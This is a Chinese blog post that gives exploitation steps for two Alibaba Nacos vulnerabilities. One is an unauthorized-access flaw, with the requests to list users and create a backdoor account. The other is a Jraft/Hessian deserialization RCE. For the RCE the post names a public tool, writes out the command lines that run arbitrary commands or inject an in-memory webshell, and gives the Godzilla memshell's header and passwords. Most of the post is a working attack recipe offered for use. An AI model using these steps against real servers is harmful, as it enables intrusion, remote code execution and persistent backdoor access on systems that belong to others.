websec80

  博客园  :: 首页  :: 新随笔  :: 联系 ::  :: 管理

漏洞描述:2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作

影响版本:
Nacos <= 2.0.0-ALPHA.1

漏洞地址:GET http://IP:端口/nacos/v1/auth/users?pageNo=1&pageSize=9

利用方式:POST http://IP:端口/nacos/v1/auth/users?username=test1&password=test1

 

加账户密码登录

 

 

描述

Nacos 在处理某些基于 Jraft 的请求时,采用 Hessian 进行反序列化,但并未设置限制,导致应用存在远程代码执行(RCE)漏洞。

影响版本

1.4.0 <= Nacos < 1.4.6 使用cluster集群模式运行
2.0.0 <= Nacos < 2.2.3 任意模式启动

复现

工具

https://github.com/c0olw/NacosRce/

说明

自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 "Command"
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 "whoami"
只注入内存马
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell

进行rce

java -jar NacosRce.jar http://172.16.10.14:8848/nacos 7848 "whoami"

 

**食用方式 **

自动注入内存马并执行命令 java -jar NacosRce.jar Url Jraft端口 "Command"

java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 "whoami"
只注入内存马

java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell
java -jar NacosRce.jar http://192.168.90.1:8848/nacos 7848 memshell

 

哥斯拉内存马:
1、需要设置请求头x-client-data:godzilla
2、设置Referer:https://www.google.com/
3、路径随意
4、密码是pass 和 key

posted on 2024-03-26 10:49  websec80  阅读(3891)  评论(0)    收藏  举报